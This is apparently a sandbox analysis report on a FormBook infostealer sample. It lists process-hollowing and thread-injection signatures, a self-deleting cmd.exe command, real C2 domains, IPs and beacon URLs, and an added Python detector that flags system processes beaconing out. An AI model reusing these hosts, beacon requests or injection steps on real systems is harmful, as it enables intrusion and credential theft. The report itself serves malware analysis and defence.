        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558ED6 mov eax, dword ptr fs:[00000030h]14_2_04558ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B36CC mov eax, dword ptr fs:[00000030h]14_2_044B36CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C8EC7 mov eax, dword ptr fs:[00000030h]14_2_044C8EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0453FEC0 mov eax, dword ptr fs:[00000030h]14_2_0453FEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B16E0 mov ecx, dword ptr fs:[00000030h]14_2_044B16E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044976E2 mov eax, dword ptr fs:[00000030h]14_2_044976E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FE87 mov eax, dword ptr fs:[00000030h]14_2_0451FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04550EA5 mov eax, dword ptr fs:[00000030h]14_2_04550EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045046A7 mov eax, dword ptr fs:[00000030h]14_2_045046A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449EF40 mov eax, dword ptr fs:[00000030h]14_2_0449EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449FF60 mov eax, dword ptr fs:[00000030h]14_2_0449FF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04558F6A mov eax, dword ptr fs:[00000030h]14_2_04558F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]14_2_0451FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451FF10 mov eax, dword ptr fs:[00000030h]14_2_0451FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]14_2_044BA70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA70E mov eax, dword ptr fs:[00000030h]14_2_044BA70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]14_2_0455070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0455070D mov eax, dword ptr fs:[00000030h]14_2_0455070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AF716 mov eax, dword ptr fs:[00000030h]14_2_044AF716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]14_2_04484F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04484F2E mov eax, dword ptr fs:[00000030h]14_2_04484F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BE730 mov eax, dword ptr fs:[00000030h]14_2_044BE730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C37F5 mov eax, dword ptr fs:[00000030h]14_2_044C37F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507794 mov eax, dword ptr fs:[00000030h]14_2_04507794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04498794 mov eax, dword ptr fs:[00000030h]14_2_04498794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]14_2_044A0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A0050 mov eax, dword ptr fs:[00000030h]14_2_044A0050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04551074 mov eax, dword ptr fs:[00000030h]14_2_04551074
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04542073 mov eax, dword ptr fs:[00000030h]14_2_04542073
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]14_2_04554015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04554015 mov eax, dword ptr fs:[00000030h]14_2_04554015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04507016 mov eax, dword ptr fs:[00000030h]14_2_04507016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0449B02A mov eax, dword ptr fs:[00000030h]14_2_0449B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B002D mov eax, dword ptr fs:[00000030h]14_2_044B002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov ecx, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0451B8D0 mov eax, dword ptr fs:[00000030h]14_2_0451B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044858EC mov eax, dword ptr fs:[00000030h]14_2_044858EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489080 mov eax, dword ptr fs:[00000030h]14_2_04489080
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]14_2_04503884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04503884 mov eax, dword ptr fs:[00000030h]14_2_04503884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044C90AF mov eax, dword ptr fs:[00000030h]14_2_044C90AF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B20A0 mov eax, dword ptr fs:[00000030h]14_2_044B20A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov ecx, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BF0BF mov eax, dword ptr fs:[00000030h]14_2_044BF0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]14_2_044AB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AB944 mov eax, dword ptr fs:[00000030h]14_2_044AB944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448C962 mov eax, dword ptr fs:[00000030h]14_2_0448C962
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]14_2_0448B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B171 mov eax, dword ptr fs:[00000030h]14_2_0448B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04489100 mov eax, dword ptr fs:[00000030h]14_2_04489100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov eax, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044A4120 mov ecx, dword ptr fs:[00000030h]14_2_044A4120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]14_2_044B513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B513A mov eax, dword ptr fs:[00000030h]14_2_044B513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0448B1E1 mov eax, dword ptr fs:[00000030h]14_2_0448B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_045141E8 mov eax, dword ptr fs:[00000030h]14_2_045141E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044AC182 mov eax, dword ptr fs:[00000030h]14_2_044AC182
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044BA185 mov eax, dword ptr fs:[00000030h]14_2_044BA185
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_044B2990 mov eax, dword ptr fs:[00000030h]14_2_044B2990
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_044B61A0  mov eax, dword ptr fs:[00000030h]  (2 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_045051BE  mov eax, dword ptr fs:[00000030h]  (4 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_045069A6  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_0454EA55  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04514257  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04489240  mov eax, dword ptr fs:[00000030h]  (4 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_0453B260  mov eax, dword ptr fs:[00000030h]  (2 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_044C927A  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04558A62  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_0454AA16  mov eax, dword ptr fs:[00000030h]  (2 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04498A0A  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_044A3A1C  mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04485210  mov eax, dword ptr fs:[00000030h]  (3 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_04485210  mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_0448AA16  mov eax, dword ptr fs:[00000030h]  (2 occurrences)
        Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 14_2_044C4A2C  mov eax, dword ptr fs:[00000030h]  (2 occurrences)
        Source: C:\Users\user\Desktop\Design Template.exe  Process token adjusted: Debug
        Source: C:\Users\user\Desktop\Design Template.exe  Code function: 2_2_00424EAA  SetUnhandledExceptionFilter
        Source: C:\Users\user\Desktop\Design Template.exe  Code function: 2_2_00424EBC  SetUnhandledExceptionFilter

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exe  Network Connect: 198.50.252.64 80
        Source: C:\Windows\explorer.exe  Domain query: www.gxjljc.com
        Source: C:\Windows\explorer.exe  Domain query: www.betralifcannabis.com
        Source: C:\Windows\explorer.exe  Network Connect: 160.153.136.3 80
        Source: C:\Windows\explorer.exe  Domain query: www.modomo.amsterdam
        Source: C:\Windows\explorer.exe  Domain query: www.bestflowersandgifts.com
        Source: C:\Windows\explorer.exe  Network Connect: 47.105.113.141 80
        Source: C:\Windows\explorer.exe  Domain query: www.2elden.com
        Source: C:\Windows\explorer.exe  Network Connect: 14.215.190.65 80
        Source: C:\Windows\explorer.exe  Domain query: www.zq2003.com
        Source: C:\Windows\explorer.exe  Domain query: www.landreclaim.com
        Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
        Source: C:\Windows\explorer.exe  Domain query: www.rememberingedward.info
        Source: C:\Windows\explorer.exe  Network Connect: 156.226.160.56 80
        Source: C:\Windows\explorer.exe  Domain query: www.chuanyangwenhua.com
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\Design Template.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
        Source: C:\Users\user\Desktop\Design Template.exe  Section loaded: unknown  target: C:\Windows\SysWOW64\rundll32.exe  protection: execute and read and write
        Source: C:\Users\user\Desktop\Design Template.exe  Section loaded: unknown  target: C:\Windows\SysWOW64\rundll32.exe  protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exe  Section loaded: unknown  target: C:\Windows\explorer.exe  protection: execute and read and write
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\Design Template.exe  Thread register set: target process: 3292
        Source: C:\Windows\SysWOW64\rundll32.exe  Thread register set: target process: 3292
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\Design Template.exe  Thread APC queued: target process: C:\Windows\explorer.exe
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\Design Template.exe  Section unmapped: C:\Windows\SysWOW64\rundll32.exe  base address: 1030000
        Source: C:\Users\user\Desktop\Design Template.exe  Process created: C:\Users\user\Desktop\Design Template.exe C:\Users\user\Desktop\Design Template.exe
        Source: C:\Windows\SysWOW64\rundll32.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Design Template.exe'
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp  Binary or memory string: uProgram Manager
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp  Binary or memory string: Progman
        Source: explorer.exe, 00000007.00000002.504496251.0000000001400000.00000002.00000001.sdmp, rundll32.exe, 0000000E.00000002.505387149.0000000003050000.00000002.00000001.sdmp  Binary or memory string: Progmanlock
        Source: explorer.exe, 00000007.00000002.502832403.0000000000EB8000.00000004.00000020.sdmp  Binary or memory string: ProgmanX
        Source: explorer.exe, 00000007.00000000.303083961.0000000008ACF000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWndAj
        Source: C:\Users\user\Desktop\Design Template.exe  Code function: 2_2_00431B5C  GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA
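        The lines above are the evidence behind the "System process connects to network" verdict: explorer.exe, which only carries FormBook because of the APC queue and thread-context writes listed beside it, resolves the C2 domains and opens port 80 to six addresses. The Python below is an added example and not part of the Joe Sandbox report. It parses signature lines of exactly this shape into an IOC set, then applies the same reasoning as the sandbox signature to Sysmon-style NetworkConnect events: a system binary that should never originate traffic reaching a globally routable address. The event tuples and the deny-list of processes are constructed assumptions for illustration.

```python
"""Pull network IOCs out of sandbox signature lines and flag outbound
connections from processes that should not be originating traffic.

Added example, not part of the Joe Sandbox report. The event tuples and the
list of processes treated as 'never talks to the internet' are assumptions.
"""
import ipaddress
import re

# Constructed sample: the report's own "System process connects to network"
# lines, copied as rendered (the renderer glued "explorer.exe" to the label
# that follows it and appended link text; the regex tolerates both).
SANDBOX_LINES = """\
Source: C:\\Windows\\explorer.exeNetwork Connect: 198.50.252.64 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.gxjljc.com
Source: C:\\Windows\\explorer.exeDomain query: www.betralifcannabis.com
Source: C:\\Windows\\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.modomo.amsterdam
Source: C:\\Windows\\explorer.exeDomain query: www.bestflowersandgifts.com
Source: C:\\Windows\\explorer.exeNetwork Connect: 47.105.113.141 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.2elden.com
Source: C:\\Windows\\explorer.exeNetwork Connect: 14.215.190.65 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.zq2003.com
Source: C:\\Windows\\explorer.exeDomain query: www.landreclaim.com
Source: C:\\Windows\\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.rememberingedward.info
Source: C:\\Windows\\explorer.exeNetwork Connect: 156.226.160.56 80Jump to behavior
Source: C:\\Windows\\explorer.exeDomain query: www.chuanyangwenhua.com
"""

# Lazy "\S+?\.exe" stops at the first ".exe", so the glued label is not
# swallowed into the image path.
LINE_RE = re.compile(
    r"Source:\s*(?P<image>\S+?\.exe)\s*"
    r"(?:Network Connect:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)"
    r"|Domain query:\s*(?P<domain>[A-Za-z0-9.-]+))"
)


def extract_iocs(text):
    """Return ({ip: {ports}}, {domains}, {image basenames}) from signature lines."""
    ips, domains, images = {}, set(), set()
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        images.add(m["image"].rsplit("\\", 1)[-1].lower())
        if m["ip"]:
            ips.setdefault(m["ip"], set()).add(int(m["port"]))
        else:
            domains.add(m["domain"].lower())
    return ips, domains, images


# Assumption: on a managed workstation these Windows binaries are not expected
# to originate internet connections; a hit is an injection indicator.
NO_INTERNET_IMAGES = {"explorer.exe", "conhost.exe", "cmd.exe"}


def flag_injected_beacons(events, no_internet=NO_INTERNET_IMAGES):
    """events: iterable of (image_basename, dst_ip, dst_port), e.g. from
    Sysmon Event ID 3. Returns the events where a deny-listed process
    reaches a globally routable address; RFC1918 and loopback traffic
    (file shares, the local resolver) is left alone."""
    hits = []
    for image, dst_ip, dst_port in events:
        if image.lower() not in no_internet:
            continue
        if not ipaddress.ip_address(dst_ip).is_global:
            continue
        hits.append((image, dst_ip, dst_port))
    return hits


# Constructed Sysmon-style events: two benign, two mirroring the report.
SAMPLE_EVENTS = [
    ("chrome.exe", "34.102.136.180", 443),
    ("explorer.exe", "10.0.0.5", 445),
    ("explorer.exe", "198.50.252.64", 80),
    ("explorer.exe", "156.226.160.56", 80),
]

if __name__ == "__main__":
    ips, domains, images = extract_iocs(SANDBOX_LINES)
    print(f"{len(ips)} C2 IPs and {len(domains)} domains, all from {sorted(images)}")
    for hit in flag_injected_beacons(SAMPLE_EVENTS):
        print("ALERT injected system process beaconing:", hit)
```

        The deny-list is deliberately short; rundll32.exe is left off it because it has legitimate network use on many hosts, which is exactly why the sandbox attributes the beacons to explorer.exe rather than to the rundll32.exe stage.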

        Stealing of Sensitive Information:

        Yara detected FormBook
        Source: Yara match  File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Remote Access Functionality:

        Yara detected FormBook
        Source: Yara match  File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match  File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match  File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

        Mitre Att&ck Matrix

        (digits after a technique name are the report's signature-count badges, kept as rendered)

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Masquerading 1 | Input Capture 1 | Security Software Discovery 121 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | - | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 4 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 385453  Sample: Design Template.exe  Start date: 12/04/2021  Architecture: WINDOWS  Score: 100

        Top-level DNS/IP info: yashasvsaluja.com; www.yashasvsaluja.com; 7 other IPs or domains
        Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

        Process tree (as drawn in the graph):
        Design Template.exe (started)
          dropped: C:\Users\user\AppData\Local\...\Liebert.bmp, PE32
          started: Design Template.exe
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            injected: explorer.exe
              DNS/IP: www.2elden.com 156.226.160.56, 49724, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles; www.landreclaim.com 198.50.252.64, 49725, 80, OVHFR, Canada; 13 other IPs or domains
              signatures: System process connects to network (likely due to code injection or exploit)
              started: rundll32.exe
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                started: cmd.exe
                  started: conhost.exe


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        Design Template.exe | 35% | Virustotal | -
        Design Template.exe | 100% | Avira | HEUR/AGEN.1106037
        Design Template.exe | 100% | Joe Sandbox ML | -

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\Liebert.bmp | 100% | Avira | TR/Crypt.ZPACK.Gen
        C:\Users\user\AppData\Local\Temp\Liebert.bmp | 100% | Joe Sandbox ML | -

        Unpacked PE Files

        Source | Detection | Scanner | Label
        2.1.Design Template.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        4.1.Design Template.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
        14.2.rundll32.exe.7b4cd8.1.unpack | 100% | Avira | TR/Patched.Gen
        2.2.Design Template.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1106037
        2.0.Design Template.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1106037
        14.2.rundll32.exe.4997960.5.unpack | 100% | Avira | TR/Patched.Gen
        4.0.Design Template.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1106037

        Domains

        Source | Detection | Scanner | Label
        gz01.bch.baidu-itm.com | 2% | Virustotal | -
        bestflowersandgifts.com | 0% | Virustotal | -
        www.realunitystudio.com | 0% | Virustotal | -

        URLs

        Source | Detection | Scanner | Label
        http://schemas.mi | 0% | URL Reputation | safe
        http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
        http://www.zq2003.com/ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx | 0% | Avira URL Cloud | safe
        http://www.tiro.com | 0% | URL Reputation | safe
        http://www.goodfont.co.kr | 0% | URL Reputation | safe
        http://schemas.micr | 0% | URL Reputation | safe
        http://www.rememberingedward.info/ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== | 0% | Avira URL Cloud | safe
        http://www.bestflowersandgifts.com/ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== | 0% | Avira URL Cloud | safe
